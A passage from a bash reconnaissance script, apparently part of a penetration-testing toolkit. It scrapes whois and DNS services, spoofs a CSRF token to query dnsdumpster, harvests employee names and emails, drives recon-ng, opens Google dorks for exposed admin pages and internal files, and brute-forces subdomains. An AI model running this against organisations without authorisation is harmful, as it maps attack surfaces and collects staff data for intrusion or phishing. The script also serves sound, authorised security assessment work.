this|with many different|with no guarantee|we reserve|whitelist|whois|you agree|You may not)' tmp2 > tmp3
# Remove lines starting with "*"
sed '/^*/d' tmp3 > tmp4
# Remove lines starting with "-"
sed '/^-/d' tmp4 > tmp5
# Remove lines starting with http
sed '/^http/d' tmp5 > tmp6
# Remove lines starting with US
sed '/^US/d' tmp6 > tmp7
# Clean up phone numbers
sed 's/+1.//g' tmp7 > tmp8
# Remove leading whitespace from file
awk '!d && NF {sub(/^[[:blank:]]*/,""); d=1} d' tmp8 > tmp9
# Remove trailing whitespace from each line
sed 's/[ \t]*$//' tmp9 > tmp10
# Compress blank lines
cat -s tmp10 > tmp11
# Remove lines that end with various words then a colon or period(s)
egrep -v '(2:$|3:$|Address.$|Address........$|Address.........$|Ext.:$|FAX:$|Fax............$|Fax.............$|Province:$|Server:$)' tmp11 > tmp12
# Remove line after "Domain Servers:"
sed -i '/^Domain Servers:/{n; /.*/d}' tmp12
# Remove line after "Domain servers"
sed -i '/^Domain servers/{n; /.*/d}' tmp12
# Remove blank lines from end of file
awk '/^[[:space:]]*$/{p++;next} {for(i=0;i<p;i++){printf "\n"}; p=0; print}' tmp12 > tmp13
# Format output
sed 's/: /:#####/g' tmp13 | column -s '#' -t -n > whois-domain
rm tmp*
echo " IP (30/$total)"
curl -s https://www.ultratools.com/tools/ipWhoisLookupResult?ipAddress=$domain > ultratools
y=$(sed -e 's/^[ \t]*//' ultratools | grep -A1 '>IP Address' | grep -v 'IP Address' | grep -o -P '(?<=>).*(?=<)')
if ! [ "$y" = "" ]; then
whois -H $y > tmp
# Remove leading whitespace
sed 's/^[ \t]*//' tmp > tmp2
# Remove trailing whitespace from each line
sed 's/[ \t]*$//' tmp2 > tmp3
# Clean up
egrep -v '(\#|\%|\*|All reports|Comment|dynamic hosting|For fastest|For more|Found a referral|http|OriginAS:$|Parent:$|point in|RegDate:$|remarks:|The activity|the correct|this kind of object|Without these)' tmp3 > tmp4
# Remove leading whitespace from file
awk '!d && NF {sub(/^[[:blank:]]*/,""); d=1} d' tmp4 > tmp5
# Remove blank lines from end of file
awk '/^[[:space:]]*$/{p++;next} {for(i=0;i<p;i++){printf "\n"}; p=0; print}' tmp5 > tmp6
# Compress blank lines
cat -s tmp6 > tmp7
# Clean up
sed 's/+1-//g' tmp7 > tmp8
# Change multiple spaces to single
sed 's/ \+ / /g' tmp8 > tmp9
# Format output
sed 's/: /:#####/g' tmp9 | column -s '#' -t -n > whois-ip
rm tmp*
else
echo > whois-ip
fi
rm ultratools
echo
##############################################################
echo "crt.sh (31/$total)"
python parsers/parse-certificates.py $domain > tmp
cat tmp >> $home/data/$domain/data/certificates.htm
echo "</pre>" >> $home/data/$domain/data/certificates.htm 2>/dev/null
rm tmp
echo
echo "dnsdumpster.com (32/$total)"
curl -s https://dnsdumpster.com/static/map/$domain.png
sleep 15
wget -q https://dnsdumpster.com/static/map/$domain.png -O $home/data/$domain/assets/images/dnsdumpster.png
# Generate a random cookie value
rando=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1)
curl -s --header "Host:dnsdumpster.com" --referer https://dnsdumpster.com --user-agent "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" --data "csrfmiddlewaretoken=$rando&targetip=$domain" --cookie "csrftoken=$rando; _ga=GA1.2.1737013576.1458811829; _gat=1" https://dnsdumpster.com > tmp
dumpsterxls=$(grep 'xls' tmp | tr '"' ' ' | cut -d ' ' -f10)
wget -q $dumpsterxls -O tmp.xlsx
xlsx2csv tmp.xlsx tmp.csv
cat tmp.csv | sed 's/,"//g' | egrep -v '(Hostname|MX|NS)' | cut -d ',' -f1-2 | grep -v '"' | sed 's/,/ /g' | column -t | sort -u > sub-dnsdumpster
rm tmp*
echo
echo "email-format.com (33/$total)"
curl -s https://www.email-format.com/d/$domain/ > tmp
grep -o [A-Za-z0-9_.]*@[A-Za-z0-9_.]*[.][A-Za-z]* tmp | tr '[A-Z]' '[a-z]' | sort -u > zemail-format
rm tmp
echo
echo "intodns.com (34/$total)"
wget -q http://www.intodns.com/$domain -O tmp
cat tmp | sed '1,32d; s/<table width="99%" cellspacing="1" class="tabular">/<center><table width="85%" cellspacing="1" class="tabular"><\/center>/g; s/Test name/Test/g; s/ <a href="feedback\/?KeepThis=true&TB_iframe=true&height=300&width=240" title="intoDNS feedback" class="thickbox feedback">send feedback<\/a>//g; s/ background-color: #ffffff;//; s/<center><table width="85%" cellspacing="1" class="tabular"><\/center>/<table class="table table-bordered">/; s/<td class="icon">/<td class="inc-table-cell-status">/g; s/<tr class="info">/<tr>/g' | egrep -v '(Processed in|UA-2900375-1|urchinTracker|script|Work in progress)' | sed '/footer/I,+3 d; /google-analytics/I,+5 d' > tmp2
cat tmp2 >> $home/data/$domain/pages/config.htm
# Add new icons
sed -i 's|/static/images/error.gif|\.\./assets/images/icons/fail.png|g' $home/data/$domain/pages/config.htm
sed -i 's|/static/images/fail.gif|\.\./assets/images/icons/fail.png|g' $home/data/$domain/pages/config.htm
sed -i 's|/static/images/info.gif|\.\./assets/images/icons/info.png|g' $home/data/$domain/pages/config.htm
sed -i 's|/static/images/pass.gif|\.\./assets/images/icons/pass.png|g' $home/data/$domain/pages/config.htm
sed -i 's|/static/images/warn.gif|\.\./assets/images/icons/warn.png|g' $home/data/$domain/pages/config.htm
sed -i 's|\.\.\.\.|\.\.|g' $home/data/$domain/pages/config.htm
# Insert missing table tag
sed -i 's/.*<thead>.*/ <table border="4">\n&/' $home/data/$domain/pages/config.htm
# Add blank lines below table
sed -i 's/.*<\/table>.*/&\n<br>\n<br>/' $home/data/$domain/pages/config.htm
# Remove unnecessary JS at bottom of page
sed -i '/Math\.random/I,+6 d' $home/data/$domain/pages/config.htm
rm tmp*
echo
echo "robtex.com (35/$total)"
wget -q https://gfx.robtex.com/gfx/graph.png?dns=$domain -O $home/data/$domain/assets/images/robtex.png
echo
echo "Registered Domains (36/$total)"
# f_regdomain: for every domain name listed (one per line) in tmp3, gather
# whois details (registrar, registrant org, registrant email) and resolve
# an IP address via a single ping, appending one CSV row per domain to
# tmp4. Displays a running "N of M domains" counter on one line.
f_regdomain(){
while read regdomain; do
# -H omits the whois legal disclaimer; normalize whitespace and turn
# 'key: value' into 'key:value' so cut -d ':' works below
whois -H $regdomain 2>&1 | sed -e 's/^[ \t]*//; s/ \+ //g; s/: /:/g' > tmp5
nomatch=$(grep -c -E 'No match for|Name or service not known' tmp5)
if [[ $nomatch -eq 1 ]]; then
echo "$regdomain -- No Whois Matches Found" >> tmp4
else
registrar=$(grep -m1 'Registrar:' tmp5 | cut -d ':' -f2 | sed 's/,//g')
regorg=$(grep -m1 'Registrant Organization:' tmp5 | cut -d ':' -f2 | sed 's/,//g')
regemail=$(grep -m1 'Registrant Email:' tmp5 | cut -d ':' -f2 | tr 'A-Z' 'a-z')
# One ping to resolve the IP; parsed out of the 'PING host (a.b.c.d)' banner
iptmp=$(ping -c1 $regdomain 2>&1)
if echo $iptmp | grep -q 'unknown host'; then
echo "$regdomain,No IP Found,$regemail,$regorg,$registrar" >> tmp4
else
ipaddr=$(echo $iptmp | grep 'PING' | cut -d '(' -f2 | cut -d ')' -f1)
echo "$regdomain,$ipaddr,$regemail,$regorg,$registrar" >> tmp4
fi
fi
let number=number+1
echo -ne " ${YELLOW}$number ${NC}of ${YELLOW}$domcount ${NC}domains"\\r
# Throttle lookups to avoid whois rate limiting
sleep 2
done < tmp3
}
# Get domains registered by company name and email address domain
curl -sL http://viewdns.info/reversewhois/?q=%40$domain > tmp
sleep 2
curl -sL http://viewdns.info/reversewhois/?q=$companyurl > tmp2
# The placeholder sorts to the top of tmp4 and is later rewritten into
# the CSV header row during the clean-up pass below.
echo '111AAA--placeholder--' > tmp4
if grep -q 'There are 0 domains' tmp && grep -q 'There are 0 domains' tmp2; then
rm tmp tmp2
echo 'No Domains Found.' > tmp6
elif ! [ -s tmp ] && ! [ -s tmp2 ]; then
rm tmp tmp2
echo 'No Domains Found.' > tmp6
# Loop thru list of domains, gathering details about the domain
elif grep -q 'paymenthash' tmp; then
# Presumably the newer viewdns markup (rows keyed by 'Domain Name') --
# extract domain names from table cells, merge both result sets, dedupe.
grep 'Domain Name' tmp | sed 's/<tr>/\n/g' | grep '</td></tr>' | cut -d '>' -f2 | cut -d '<' -f1 > tmp3
grep 'Domain Name' tmp2 | sed 's/<tr>/\n/g' | grep '</td></tr>' | cut -d '>' -f2 | cut -d '<' -f1 >> tmp3
sort -uV tmp3 -o tmp3
domcount=$(wc -l tmp3 | sed -e 's/^[ \t]*//' | cut -d ' ' -f1)
f_regdomain
else
# Older viewdns markup -- same extraction, different anchor text
grep 'ViewDNS.info' tmp | sed 's/<tr>/\n/g' | grep '</td></tr>' | grep -v -E 'font size|Domain Name' | cut -d '>' -f2 | cut -d '<' -f1 > tmp3
grep 'ViewDNS.info' tmp2 | sed 's/<tr>/\n/g' | grep '</td></tr>' | grep -v -E 'font size|Domain Name' | cut -d '>' -f2 | cut -d '<' -f1 >> tmp3
sort -uV tmp3 -o tmp3
domcount=$(wc -l tmp3 | sed -e 's/^[ \t]*//' | cut -d ' ' -f1)
f_regdomain
fi
# Formatting & clean-up
sort tmp4 | sed 's/111AAA--placeholder--/Domain,IP Address,Registration Email,Registration Org,Registrar,/' | grep -v 'Matches Found' > tmp6
grep "@$domain" tmp6 | sed 's/LLC /LLC./g' | column -n -s ',' -t > registered-domains
rm tmp*
echo
##############################################################
# Consolidate theHarvester output (z* files) into emails, sub-domains,
# and candidate people names.
cat z* | grep '@' | grep -v '\.\.\.' | sort -u > emails
cat z* | grep ':' | sed 's/:/ /g; s/ empty//g' | column -t | sort -u > sub-theHarvester
cat z* | egrep -v '(@|:|\.)' | sort -u | cut -d '-' -f1 > tmp
if [ -e tmp ]; then
# Remove lines that start with .
sed '/^\./ d' tmp > tmp2
# Change to lower case
cat tmp2 | tr '[A-Z]' '[a-z]' > tmp3
# Clean up
# Drop punctuation and a long blocklist of job-title / organization words
# that are not people names. NOTE(review): the quoted pattern spans three
# physical lines; grep treats each newline-separated segment as a
# separate pattern, so the line breaks are load-bearing -- do not rewrap.
egrep -v '(~|`|!|@|#|\$|%|\^|&|\*|\(|\)|_|-|\+|=|{|\[|}|]|\|:|;|"|<|>|\.|\?|/|abuse|academy|account|achievement|acquisition|acting|action|active|adjuster|admin|advanced|adventure|advertising|agency|alliance|allstate|ambassador|america|american|analysis|analyst|analytics|animal|another|antivirus|apple seems|application|applications|architect|archivist|article|assembler|assembling|assembly|asian|assignment|assistant|associate|association|attorney|audience|audio|auditor|australia|authority|automation|automotive|aviation|balance|bank|bbc|beginning|berlin|beta theta|between|big game|billion|bioimages|biometrics|bizspark|breaches|broker|builder|business|buyer|buying|california|cannot|capital|career|carrying|cashing|center|centre|certified|cfi|challenger|championship|change|chapter|charge|chemistry|china|chinese|claim|class|clearance|cloud|cnc|code|cognitive|college|columbia|coming|commercial|communications|community|company pages|competition|competitive|compliance|computer|comsec|concept|conference|config|connections|connect|construction|consultant|contact|contract|contributor|control|cooperation|coordinator|corporate|corporation|counsel|create|creative|critical|crm|croatia|cryptologic|custodian|cyber|dallas|database|day care|dba|dc|death toll|delivery|delta|department|deputy|description|designer|design|destructive|detection|develop|devine|dialysis|digital|diploma|direct|disability|disaster|disclosure|dispatch|dispute|distribut|divinity|division|dns|document|dos poc|download|driver|during|economy|ecovillage|editor|education|effect|electronic|else|email|embargo|emerging|empower|employment|end user|energy|engineer|enterprise|entertainment|entreprises|entrepreneur|entry|environmental|error page|ethical|example|excellence|executive|expectations|expertzone|exploit|expressplay|facebook|facilit|faculty|failure|fall edition|fast track|fatherhood|fbi|federal|fellow|filmmaker|finance|financial|fitter|forensic|forklift|found|freelance|from|frontiers in 
tax|fulfillment|full|function|future|fuzzing|germany|get control|global|gnoc|google|governance|government|graphic|greater|group|guard|hackers|hacking|harden|harder|hawaii|hazing|headquarters|health|help|history|homepage|hospital|hostmaster|house|how to|hurricane|icmp|idc|in the news|index|infant|inform|innovation|installation|insurers|integrated|intellectual|international|internet|instructor|insurance|intelligence|interested|interns|investigation|investment|investor|israel|items|japan|job|justice|kelowna|knowing|language|laptops|large|leader|letter|level|liaison|licensing|lighting|linguist|linkedin|limitless|liveedu|llp|local|looking|lpn|ltd|lsu|luscous|machinist|macys|malware|managed|management|manager|managing|manufacturing|market|mastering|material|mathematician|maturity|md|mechanic|media|medical|medicine|member|merchandiser|meta tags|methane|metro|microsoft|middle east|migration|mission|mitigation|mn|money|monitor|more coming|mortgage|motor|museums|mutual|national|negative|network|network|new user|newspaper|new york|next page|night|nitrogen|nw|nyc|obtain|occupied|offers|office|online|onsite|operations|operator|order|organizational|outbreak|owner|packaging|page|palantir|paralegal|partner|pathology|peace|people|perceptions|person|pharmacist|philippines|photo|picker|picture|placement|places|planning|police|portfolio|postdoctoral|potassium|potential|preassigned|preparatory|president|principal|print|private|process|producer|product|professional|professor|profile|project|program|property|publichealth|published|pyramid|quality|questions|rcg|recruiter|redeem|redirect|region|register|registry|regulation|rehab|remote|report|representative|republic|research|resolving|responsable|restaurant|retired|revised|rising|rural health|russia|sales|sample|satellite|save the date|school|scheduling|science|scientist|search|searc|sections|secured|security|secretary|secrets|see more|selection|senior|server|service|services|social|software|solution|source|special|sql|station 
home|statistics|store|strategy|strength|student|study|substitute|successful|sunoikisis|superheroines|supervisor|support|surveillance|switch|system|systems|talent|targeted|tax|tcp|teach|technical|technician|technique|technology|temporary|tester|textoverflow|theater|thought|through|time in|tit for tat|title|toolbook|tools|toxic|traditions|trafficking|transfer|transformation|treasury|trojan|truck|twitter|training|ts|tylenol|types of scams|unclaimed|underground|underwriter|university|united states|untitled|vault|verification|vietnam|view|Violent|virginia bar|voice|volkswagen|volume|vp|wanted|web search|web site|website|welcome|west virginia|westchester|when the|whiskey|window|worker|world|www|xbox|zz)' tmp3 > tmp4
# Roman numeral suffixes back to upper case
cat tmp4 | sed 's/iii/III/g; s/ii/II/g' > tmp5
# Capitalize the first letter of every word and tweak
cat tmp5 | sed 's/\b\(.\)/\u\1/g; s/ And / and /; s/ Av / AV /g; s/ It / IT /g; s/ Of / of /g; s/Mca/McA/g; s/Mcb/McB/g; s/Mcc/McC/g;
s/Mcd/McD/g; s/Mce/McE/g; s/Mcf/McF/g; s/Mcg/McG/g; s/Mci/McI/g; s/Mck/McK/g; s/Mcl/McL/g; s/Mcm/McM/g; s/Mcn/McN/g; s/Mcp/McP/g; s/Mcq/McQ/g;
s/Mcs/McS/g; s/ Ui / UI /g; s/ Ux / UX /g; s/,,/,/g' > tmp6
# Turn 'First Last' lines (no comma yet) into 'Last, First'
grep -v ',' tmp6 | awk '{print $2", "$1}' > tmp7
grep ',' tmp7 > tmp8
# Remove trailing whitespace from each line
cat tmp7 tmp8 | sed 's/[ \t]*$//' | sed '/^\,/ d' | sort -u > names
fi
##############################################################
echo
echo -n "Do you have a list of names to import? (y/N) "
echo "Example: last, first"
read answer
if [ "$answer" == "y" ]; then
f_location
# Build a recon-ng-importable CSV: last_name#first_name#title
echo "last_name#first_name#title" > /tmp/names.csv
cat $location | sed 's/, /#/; s/ /#/' | tr -s ' ' | tr -d '\t' | sed 's/;/#/g; s/#$//g' >> /tmp/names.csv
cat $discover/resource/recon-ng-import-names.rc > tmp.rc
fi
echo "recon-ng (37/$total)"
echo
# Assemble the passive recon-ng resource script: workspace, company,
# domain, optional name import, then the stock passive module list.
echo "workspaces add $domain" > passive.rc
echo "add companies" >> passive.rc
echo "$companyurl" >> passive.rc
# Undo the URL-encoding that was applied when $companyurl was built
sed -i 's/%26/\&/g; s/%20/ /g; s/%2C/\,/g' passive.rc
echo "none" >> passive.rc
echo "add domains" >> passive.rc
echo "$domain" >> passive.rc
echo >> passive.rc
if [ -e tmp.rc ]; then
cat tmp.rc >> passive.rc
fi
if [ -e names ]; then
echo "last_name#first_name" > /tmp/names2.csv
sed 's/, /#/' names >> /tmp/names2.csv
cat $discover/resource/recon-ng-import-names2.rc >> passive.rc
echo >> passive.rc
fi
cat $discover/resource/recon-ng.rc >> passive.rc
sed -i "s/yyy/$domain/g" passive.rc
# NOTE(review): passive.rc is written to the CWD but referenced as
# $discover/passive.rc -- assumes the script runs with CWD == $discover; verify.
recon-ng --no-check -r $discover/passive.rc
##############################################################
# Post-process the recon-ng spool files from /tmp into per-category lists.
grep '@' /tmp/emails | awk '{print $2}' | egrep -v '(>|SELECT)' | sort -u > emails-recon
cat emails emails-recon | tr '[A-Z]' '[a-z]' | sort -u > emails-final
# Drop the spool header (3 lines) and footer (4 lines), then fix the
# capitalization of Mc-prefixed surnames.
sed '1,3d' /tmp/names | head -n -4 | sed 's/Mca/McA/g; s/Mcb/McB/g; s/Mcc/McC/g; s/Mcd/McD/g; s/Mce/McE/g; s/Mcf/McF/g; s/Mcg/McG/g; s/Mci/McI/g;
s/Mck/McK/g; s/Mcl/McL/g; s/Mcm/McM/g; s/Mcn/McN/g; s/Mcp/McP/g; s/Mcq/McQ/g; s/Mcs/McS/g' > names-recon
grep '/' /tmp/networks | grep -v 'Spooling' | awk '{print $2}' | $sip > networks-recon
grep "$domain" /tmp/subdomains | egrep -v '(\*|%|>|SELECT|www)' | awk '{print $2,$4}' | sed 's/|//g' | column -t | sort -u > sub-recon
# Usernames of the form 'first-last' become 'Last, First' name candidates
cat /tmp/usernames | awk '{print $2}' | grep '[0-9]$' | sed 's/-/ /g' | awk '{print $2 ", " $1}' | sed '/[0-9]/d' | sed '/^,/d' | sed -e 's/\b\(.\)/\u\1/g' | sed 's/Mca/McA/g; s/Mcb/McB/g; s/Mcc/McC/g; s/Mcd/McD/g; s/Mce/McE/g; s/Mcf/McF/g; s/Mcg/McG/g; s/Mci/McI/g; s/Mck/McK/g; s/Mcl/McL/g;
s/Mcm/McM/g; s/Mcn/McN/g; s/Mcp/McP/g; s/Mcq/McQ/g; s/Mcs/McS/g' | sort -u > usernames-recon
##############################################################
# Merge network lists; $sip sorts IP addresses numerically
cat networks-tmp networks-recon | sort -u | $sip > networks 2>/dev/null
# Find lines that contain IPs and clean up
cat sub* /tmp/sub-recon | grep -E "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | egrep -v '(outlook|www)' | column -t | sort -u > subdomains
awk '{print $2}' subdomains > tmp
grep -E '([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})' tmp | egrep -v '(-|=|:)' | sed '/^$/d' | $sip > hosts
if [ -e networks ]; then
cat networks > tmp 2>/dev/null
echo >> tmp
fi
cat hosts >> tmp 2>/dev/null
cat tmp >> $home/data/$domain/data/hosts.htm
echo "</pre>" >> $home/data/$domain/data/hosts.htm 2>/dev/null
##############################################################
# Build the passive-recon summary: counts go into zreport's header,
# full listings accumulate in tmp, and each category is also published
# to its own HTML report page.
echo "Summary" > zreport
echo $short >> zreport
echo > tmp
if [ -e emails-final ]; then
emailcount=$(wc -l emails-final | cut -d ' ' -f1)
echo "Emails $emailcount" >> zreport
echo "Emails ($emailcount)" >> tmp
echo $short >> tmp
cat emails-final >> tmp
echo >> tmp
cat emails-final >> $home/data/$domain/data/emails.htm
echo "</pre>" >> $home/data/$domain/data/emails.htm
else
echo "No data found." >> $home/data/$domain/data/emails.htm
echo "</pre>" >> $home/data/$domain/data/emails.htm
fi
if [ -e names-recon ]; then
namecount=$(wc -l names-recon | cut -d ' ' -f1)
echo "Names $namecount" >> zreport
echo "Names ($namecount)" >> tmp
echo $long >> tmp
cat names-recon >> tmp
echo >> tmp
cat names-recon >> $home/data/$domain/data/names.htm
echo "</pre>" >> $home/data/$domain/data/names.htm
else
echo "No data found." >> $home/data/$domain/data/names.htm
echo "</pre>" >> $home/data/$domain/data/names.htm
fi
# Append network, DNS record, and host counts to the summary header
# (zreport) and their full listings to the detail section (tmp).
if [ -s networks ]; then
     networkcount=$(wc -l networks | cut -d ' ' -f1)
     echo "Networks $networkcount" >> zreport
     {
          echo "Networks ($networkcount)"
          echo $short
          cat networks
          echo
     } >> tmp
fi
if [ -e records ]; then
     recordcount=$(wc -l records | cut -d ' ' -f1)
     echo "DNS Records $recordcount" >> zreport
     {
          echo "DNS Records ($recordcount)"
          echo $long
          cat records
          echo
     } >> tmp
fi
if [ -e hosts ]; then
     hostcount=$(wc -l hosts | cut -d ' ' -f1)
     echo "Hosts $hostcount" >> zreport
     {
          echo "Hosts ($hostcount)"
          echo $long
          cat hosts
          echo
     } >> tmp
fi
# Registered domains, squatting domains, and sub-domains: same pattern --
# count into zreport, listing into tmp, and publish to an HTML page.
if [ -s registered-domains ]; then
domaincount1=$(wc -l registered-domains | cut -d ' ' -f1)
echo "Registered Domains $domaincount1" >> zreport
echo "Registered Domains ($domaincount1)" >> tmp
echo $long >> tmp
cat registered-domains >> tmp
echo >> tmp
echo "Domains registered to $company using a corporate email." >> $home/data/$domain/data/registered-domains.htm
echo >> $home/data/$domain/data/registered-domains.htm
cat registered-domains >> $home/data/$domain/data/registered-domains.htm
echo "</pre>" >> $home/data/$domain/data/registered-domains.htm
else
echo "No data found." >> $home/data/$domain/data/registered-domains.htm
echo "</pre>" >> $home/data/$domain/data/registered-domains.htm
fi
if [ -e squatting ]; then
urlcount2=$(wc -l squatting | cut -d ' ' -f1)
echo "Squatting $urlcount2" >> zreport
echo "Squatting ($urlcount2)" >> tmp
echo $long >> tmp
cat squatting >> tmp
echo >> tmp
cat squatting >> $home/data/$domain/data/squatting.htm
echo "</pre>" >> $home/data/$domain/data/squatting.htm
else
echo "No data found." >> $home/data/$domain/data/squatting.htm
echo "</pre>" >> $home/data/$domain/data/squatting.htm
fi
if [ -e subdomains ]; then
urlcount=$(wc -l subdomains | cut -d ' ' -f1)
echo "Subdomains $urlcount" >> zreport
echo "Subdomains ($urlcount)" >> tmp
echo $long >> tmp
cat subdomains >> tmp
echo >> tmp
cat subdomains >> $home/data/$domain/data/subdomains.htm
echo "</pre>" >> $home/data/$domain/data/subdomains.htm
else
echo "No data found." >> $home/data/$domain/data/subdomains.htm
echo "</pre>" >> $home/data/$domain/data/subdomains.htm
fi
# Harvested document lists (xls, pdf, ppt, txt, doc): count into zreport,
# listing into tmp, and publish to the matching HTML page.
# NOTE(review): unlike the sections above, the no-data branches here do not
# append a closing </pre> -- confirm whether that is intentional.
if [ -e xls ]; then
xlscount=$(wc -l xls | cut -d ' ' -f1)
echo "Excel $xlscount" >> zreport
echo "Excel Files ($xlscount)" >> tmp
echo $long >> tmp
cat xls >> tmp
echo >> tmp
cat xls >> $home/data/$domain/data/xls.htm
echo '</pre>' >> $home/data/$domain/data/xls.htm
else
echo "No data found." >> $home/data/$domain/data/xls.htm
fi
if [ -e pdf ]; then
pdfcount=$(wc -l pdf | cut -d ' ' -f1)
echo "PDF $pdfcount" >> zreport
echo "PDF Files ($pdfcount)" >> tmp
echo $long >> tmp
cat pdf >> tmp
echo >> tmp
cat pdf >> $home/data/$domain/data/pdf.htm
echo '</pre>' >> $home/data/$domain/data/pdf.htm
else
echo "No data found." >> $home/data/$domain/data/pdf.htm
fi
if [ -e ppt ]; then
pptcount=$(wc -l ppt | cut -d ' ' -f1)
echo "PowerPoint $pptcount" >> zreport
echo "PowerPoint Files ($pptcount)" >> tmp
echo $long >> tmp
cat ppt >> tmp
echo >> tmp
cat ppt >> $home/data/$domain/data/ppt.htm
echo '</pre>' >> $home/data/$domain/data/ppt.htm
else
echo "No data found." >> $home/data/$domain/data/ppt.htm
fi
if [ -e txt ]; then
txtcount=$(wc -l txt | cut -d ' ' -f1)
echo "Text $txtcount" >> zreport
echo "Text Files ($txtcount)" >> tmp
echo $long >> tmp
cat txt >> tmp
echo >> tmp
cat txt >> $home/data/$domain/data/txt.htm
echo '</pre>' >> $home/data/$domain/data/txt.htm
else
echo "No data found." >> $home/data/$domain/data/txt.htm
fi
if [ -e doc ]; then
doccount=$(wc -l doc | cut -d ' ' -f1)
echo "Word $doccount" >> zreport
echo "Word Files ($doccount)" >> tmp
echo $long >> tmp
cat doc >> tmp
echo >> tmp
cat doc >> $home/data/$domain/data/doc.htm
echo '</pre>' >> $home/data/$domain/data/doc.htm
else
echo "No data found." >> $home/data/$domain/data/doc.htm
fi
# Fold the detail section into the summary, then add whois output
cat tmp >> zreport
if [ -e whois-domain ]; then
echo "Whois Domain" >> zreport
echo $long >> zreport
cat whois-domain >> zreport
cat whois-domain >> $home/data/$domain/data/whois-domain.htm
echo "</pre>" >> $home/data/$domain/data/whois-domain.htm
else
echo "No data found." >> $home/data/$domain/data/whois-domain.htm
echo "</pre>" >> $home/data/$domain/data/whois-domain.htm
fi
if [ -e whois-ip ]; then
echo >> zreport
echo "Whois IP" >> zreport
echo $long >> zreport
cat whois-ip >> zreport
cat whois-ip >> $home/data/$domain/data/whois-ip.htm
echo "</pre>" >> $home/data/$domain/data/whois-ip.htm
else
echo "No data found." >> $home/data/$domain/data/whois-ip.htm
echo "</pre>" >> $home/data/$domain/data/whois-ip.htm
fi
# Publish the full summary page, then archive all working files
cat zreport >> $home/data/$domain/data/passive-recon.htm
echo "</pre>" >> $home/data/$domain/data/passive-recon.htm
rm tmp* zreport
mv curl debug* email* hosts name* network* records registered* squatting sub* usernames-recon whois* z* doc pdf ppt txt xls $home/data/$domain/tools/ 2>/dev/null
mv passive.rc $home/data/$domain/tools/recon-ng/
cd /tmp/; mv emails names* networks subdomains usernames $home/data/$domain/tools/recon-ng/ 2>/dev/null
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The supporting data folder is located at ${YELLOW}$home/data/$domain/${NC}\n"
echo
read -p "Press <return> to continue."
##############################################################
# Open a series of Google dorks and OSINT pages for the target in the
# local browser ($web), spacing the launches out with short sleeps.
f_runlocally
$web &
sleep 4
$web https://www.google.com/search?site=\&tbm=isch\&source=hp\&q=$companyurl%2Blogo &
sleep 2
$web https://www.google.com/#q=site%3A$domain+inurl:admin &
sleep 2
$web https://www.google.com/#q=site%3A$domain+inurl:login &
sleep 2
$web https://www.google.com/#q=site%3A$domain+%22index+of/%22+%22parent+directory%22 &
sleep 2
$web https://www.google.com/#q=site%3A$domain+%22internal+use+only%22 &
sleep 2
$web https://www.google.com/#q=site%3Apastebin.com+intext:%40$domain &
sleep 2
$web https://$companyurl.s3.amazonaws.com &
sleep 2
$web http://api.hackertarget.com/pagelinks/?q=$domain &
sleep 2
# Bug fix: the '&' before cases=mostrecent was unescaped, which truncated
# the URL and ran 'cases=mostrecent' as a separate shell command. Escaped
# to match the other URLs in this section.
$web https://dockets.justia.com/search?parties=%22$companyurl%22\&cases=mostrecent &
sleep 2
$web http://www.reuters.com/finance/stocks/lookup?searchType=any\&search=$companyurl &
sleep 2
$web https://www.sec.gov/cgi-bin/browse-edgar?company=$companyurl\&owner=exclude\&action=getcompany &
sleep 2
$web https://www.ssllabs.com/ssltest/analyze.html?d=$domain\&hideResults=on\&latest &
sleep 2
$web $home/data/$domain/index.htm &
echo
echo
exit
;;
2)
# Active recon: dnsrecon, WAF detection, traceroute, Whatweb, recon-ng.
clear
f_banner
echo -e "${BLUE}Uses dnsrecon, WAF00W, traceroute, Whatweb, and recon-ng.${NC}"
echo
echo $medium
echo
echo "Usage: target.com"
echo
echo -n "Domain: "
read domain
# Check for no answer
if [[ -z $domain ]]; then
f_error
fi
# If folder doesn't exist, create it
if [ ! -d $home/data/$domain ]; then
cp -R $discover/report/ $home/data/$domain
sed 's/REPLACEDOMAIN/'$domain'/g' $home/data/$domain/index.htm > tmp
mv tmp $home/data/$domain/index.htm
fi
# Number of tests
total=9
# URL-encode spaces, ampersands, and commas in the company name
companyurl=$( printf "%s\n" "$company" | sed 's/ /%20/g; s/\&/%26/g; s/\,/%2C/g' )
echo
echo $medium
echo
echo "dnsrecon"
echo " DNS Records (1/$total)"
dnsrecon -d $domain -t std > tmp
egrep -v '(All queries|Bind Version|Could not|Enumerating SRV|not configured|Performing|Records Found|Recursion|resolving|Resolving|TXT|Wildcard)' tmp | sort > tmp2
# Remove first 6 characters from each line
sed 's/^......//g' tmp2 | column -t | sort > tmp3
grep 'TXT' tmp | sed 's/^......//g' | sort > tmp4
cat tmp3 tmp4 | column -t > records
cp $discover/report/data/records.htm $home/data/$domain/data/records.htm
cat records >> $home/data/$domain/data/records.htm
echo "</pre>" >> $home/data/$domain/data/records.htm
rm tmp*
echo " Sub-domains (2/$total)"
# Brute-force sub-domains with whichever namelist is installed (Kali path first)
if [ -f /usr/share/dnsrecon/namelist.txt ]; then
dnsrecon -d $domain -D /usr/share/dnsrecon/namelist.txt -f -t brt > tmp
fi
# PTF
if [ -f /pentest/intelligence-gathering/dnsrecon/namelist.txt ]; then
dnsrecon -d $domain -D /pentest/intelligence-gathering/dnsrecon/namelist.txt -f -t brt > tmp
fi
grep $domain tmp | grep -v "$domain\." | egrep -v '(Performing|Records Found)' | sed 's/\[\*\] //g; s/^[ \t]*//' | awk '{print $2,$3}' | column -t | sort -u > sub-dnsrecon
# Drop bracketed/bogus/placeholder rows; keep rows whose 2nd column has no letters
egrep -v '(\[|.nat.|1.1.1.1|6.9.6.9|127.0.0.1)' sub-dnsrecon | tr '[A-Z]' '[a-z]' | column -t | sort -u | awk '$2 !~ /[a-z]/' > subdomains
############################################################
# Merge newly found sub-domains into the existing report page, if any
if [ -e $home/data/$domain/data/subdomains.htm ]; then
cat $home/data/$domain/data/subdomains.htm subdomains | grep -v "<" | grep -v "$domain\." | column -t | sort -u > subdomains-combined
cp $discover/report/data/subdomains.htm $home/data/$domain/data/subdomains.htm
cat subdomains-combined >> $home/data/$domain/data/subdomains.htm
echo "</pre>" >> $home/data/$domain/data/subdomains.htm
fi
